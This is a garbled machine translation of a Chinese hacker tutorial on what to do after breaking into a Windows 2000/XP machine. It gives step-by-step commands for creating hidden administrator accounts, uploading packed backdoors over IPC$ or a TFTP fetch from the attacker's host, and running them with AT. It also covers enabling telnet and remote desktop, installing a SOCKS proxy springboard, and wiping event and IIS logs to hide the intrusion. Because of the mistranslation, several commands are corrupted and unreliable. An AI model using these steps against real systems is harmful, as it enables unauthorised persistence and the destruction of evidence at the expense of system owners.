Work after invading system / heiyeluren
We know that invading a system is sometimes more simple, but if you want to do the work after the invasion, it is not so easy, there is a saying that "playing Jiangshan is easy, defending Jiangshan is difficult", so invading a system after It is very important, and it needs to be done carefully. This article comes from this angle to tell those dishes if you get a system's permissions, I hope to have some help to them.
Description: (The system mentioned in this article "If there is no special instructions, it refers to the Windows2000 / WindowsXP system)
1. Get permissions (not in the scope of discussion, we only discuss what you have after intrusion system)
II. Establish a super-permission user (1) to create users: Net user system $ HACKER / AddNet LocalGroup Administrators System $ / Add Description: The above two commands are to create a name called "System $", the password is "Hacker" Super Permissions User (2) Clone Super User: You can use the CA tool to implement the kernel's rilled, provided as long as the administrator rights accounts and passwords have the target system. CA // ip Administrator Password IUSR_Name Password Description: Administrator - Administrator account password - administrator account password IUSR_NAME - User Password - Clone User's Password CCA: Checking the Cloning Results. CCA // IP User Passworduser: Cloned account Password: password
III. Establishing the back door (1) Upload the latter program (more methods, only two types of commonly used): Upload the back door such as Wollf, Winshell, etc., it is best to add a shell with the back door, such as UPX or aspack, etc. Shell, it is not easy to be killed by the virus firewall.
Method for uploading the back door: (a) Use IPC $: First establish a connection with the other party: NET USE // Handle IP Address / IPC $ "Password" / user: "User Name" After successful, you can upload the back door: COPY C : /Hack/wollf.exe // ip / admin $ Description: Put the wold of Wollf under your C to the other party's x: / winnt, or under the Windows directory (b) Using TFTP: Prerequisites Your entered the other party For example, if you enter the other party system through Telnet, you can pass the back door to the other party under the other's shell: TFTP -I Your IP Get Wollf.exe Description: Toolf in your machine. EXE downloads to the other party's system directory, the premise is that the other party does not ban TFTP and you have an independent IP address (the local area network machine is not line), your own machine opens the TFTPD32 FTP tool, which will listen to your 69-port connection, Then you can download your machine on the other's machine.
(2) Running the door: (a) Using the AT command: First get the time of the other system: Net time // The other party's IP is used to use the AT command: AT // The other party IP back door runs the time of the door to the door Example of the system: AT //192.168.0.1 11:02 C: /Winnt/System32/wollf.exe Note: You want to execute the AT command, the premise is that you have established IPC $ connected to the other party, and you get the other system time After you run the back door, you must have a few minutes later. In addition to using the AT command, you can use a tool called Psexec.exe to implement the function of AT. (B) Use "Dragonfly" "growers" Implement the back door, this method you can refer to the "Dragon" help file (c) to run the back door: You can log in to the other party. For example, if you use Telnet to enter the other party's system, you can run it directly. The other party did not open Telnet, then we can help it open. Open the other party's Telnet: We can use the Opentelnet.exe tool to implement, the premise must have the administrator privilege of the target system and open IPC $, the command is as follows: Opentelnet // ip username password NTLMAUTHOR TELNETPORT Description: // IP - Target IP UserName - Username Password - Password NTLMAUTHOR - NTLM's verification method TelnetPort - port verification method is: 0: Do not use NTLM authentication 1: The representative first tried to use NTLM verification, after failure, use password verification 2: After using NTLM verification, you can use the Telnet other IP port or the NC -VV other IP port to log in to the target machine. IV. Why do you want a proxy server? I don't have to say it. Let's talk about how to make a proxy. Here we use a tool SKSERVER.EXE, a proxy tool written by Snake, doing a springboard! First write a batch, the content is as follows: @echo ******************************************************* @ Echo installation Socket agent batch @ Echo by heiyeluren @ echo cqsn --- http://www.hackerxfiles.com/@echo ************************************************** ******************* ****** @ Pause @ SKSERVER -INSTALL @ echo install ... succeed! @skserver -config port 1983 @ echo set port in 1983 ... succeed! @skserver -config starttype 2 @ echo set starttype is autostart. .. succeed! @NET START SKSERVER @ echo start service ... succeed! @Echo ok ... install end! @ Pause @ EXIT
The above batch can be changed by the situation, and the SKSERVER can be changed to the name of the latter, but the "Net Start Skserver" cannot be changed, this is the default service name of the tool, and you can also change it into you. Required. After the SKSERVER.EXE is transmitted to the other party, then run the batch, you can connect the agent from the other party 1983 port, you can make a proxy server through SockCap, you can get up to 254th, who can find you, huh Ha ha ~~~
5. Open the Super Terminal If the other party is the system of Win2000 Server, you can open the other party's super terminal to do better remote control. Everyone says that the 3389 broiler is the best. Now let's try! ~~
(1) After entering the target system, enter the following content after entering the target system: (Suppose the system in C: / Winnt) Echo [Components]> C: / 3389echo tsenable = on >> C: / 3389soCMGR /i:c:/winnt/inf/sysoc.inf / u: c: / 3389 / q (can be added to the parameter / R, can suppress restart, restart after installation) or you can write this File, then transfer to the other party: [Components] tsenable = ON Saved to 3389 file, then run sysocmgr /i:/winnt/inf/sysoc.inf / u: c: / 3389 / q this command, each other After restart, you have a 3389 broiler, you can connect the other party through the Remote Desktop Connection, from Windows. (2) Using Tools: Here you can use a gadget called dixyxs.exe. Open the other party's terminal. Upload the tool to the other party, then execute the program: DixYxs.exe, wait for the broiler to restart, then the terminal service will appear after restart
6. Clear the log When you have all this, then you don't want to be found for three minutes? So you should clear the log. The log of Windows is: WWW log, FTP log, DNS log, security log, system log, application Log, etc.
(1) Manual clearance: Some logs are necessary to delete, such as web, ftp and other logs.
Log file default location: Application log, security log, system log, DNS log default location:% systemroot% / system32 / config, default file size 512KB, administrator will change this default size. Safety Log File:% SystemRoot% / System32 / Config / SECEVENT.EVT System Log File:% SystemRoot% / System32 / Config / SYSEVENT.EVT Application Log File:% SystemRoot% / System32 / Config / Appevent.evt IIS FTP Log Default location:% systemroot% / system32 / logfiles / msftpsvc1 /, default a log IIS www log default location:% systemroot% / system32 / logfiles / w3svc1 /, default a day a log Scheduler service log default location:% systemroot% / Schedlgu.txt
We can delete the relevant service: Stop Service: Net Stop W3SVC then delete the log, the log of the WWW service is in: C: / WinNT / System32 / LogFiles / W3SVC1 directory; FTP service logs in C : / Winnt / System32 / logfiles / msftpsvc1 directory. You can then use Del: del C: / Winnt / System32 / logfiles / w3svc1 /*.* / qdel C: / Winnt / System32 / logfiles / msftpsvc1 /*.* / q then is the Scheduler log, stop the service: Net Stop "Task Scheduler" then del C: /winnt/schedlgu.txt / q can be ~
The services like security logs, system logs, application logs, etc. are EventLog, which is unable to stop, so if we manually remove these logs, you must pass a very slow method: Open "Control Panel" management The "Event Viewer" in the tool "The" Actions "item in the menu has a menu named" Connect to another computer ", click on it as shown below: Enter the IP of the remote computer, then wait for a while ( Depending on the network speed of both parties, then open the "Event Viewer" of the other party: Select the "security" log of the remote computer, right-click the properties: Click the "Clear Log" button in the properties, OK! The security log is cleared! The same method clears the "System" log and "Application" log! (2) Using the tool to delete the log Use the tool to delete more than those of the logs! (A) Delete the IIS service related WWW log and FTP Logs can use Cleaniislog.exe this gadget. Usage: First use IPC $ pipes: NET USE // IP / IPC $ "Password" / user: "" You can use the following command: cleaniislog [logfile] | [ [Cleanip] |. Description: Clear log files, which represents which IP address in all clear logs,. Examples of all IP records: Cleaniislog. 127.0.0.1a. You can clear the specified IP connection record, Keep other IP records. b. After the clearance is successful, Cleaniislog will clear the running record of its own in the system log. Usage: Cleaniislog
(B) Delete security logs, system logs, and application logs, you can use Elsave.exe to use this gadget. Use: First use IPC $ pipes: NET USE // IP / IPC $ "Password" / user: "" Clear the application log of the target system: Elsave -s // ip -l "Application" -c clear target system system log: Elsave -s // ip -l "system" "-c Clear the security log of the target system: Elsave -S // ip -l "security" -c
(C) Logkiller.exe can delete all the logs of each other, including "Application Log", "Security Log", "System Log", IIS's FTP Service, IIS SMTP Service Log and IIS's WWW Service Log And the program task log, etc. Logs: Use the tool to run directly to the other party's system. Example: c: /winnt/system32/logkiller.exe
Seven.
Speaking of this, the work should be almost the work after an intrusion of a system. Of course, you have to do other jobs, not limited to the above mode, just above is a relatively basic commonly used Mode. For example, you can also set remote control software such as VNC or make your FTP server, but the premise is that you must pay attention to safety, don't leave unnecessary traces. Don't know if you have discovered One situation is that we are all using a wide variety of tools to complete our task, so don't affected it, but use too much tools, there is not much progress on our technology, so hope If you can use the tool, don't use it. For example, you can use manual to do it, so you will "know it, better", isn't it very good? My article may talk about some comparison Old things, there may be many masters don't want to see, huh, I think this position is in the vegetable vegetable, let everyone confuse this small problem. Statement: The above is pure discussion technology, If any organization or individual uses the above method, it will be sanctions to be criminalized, and all the organizations or individuals have nothing to do with the author.
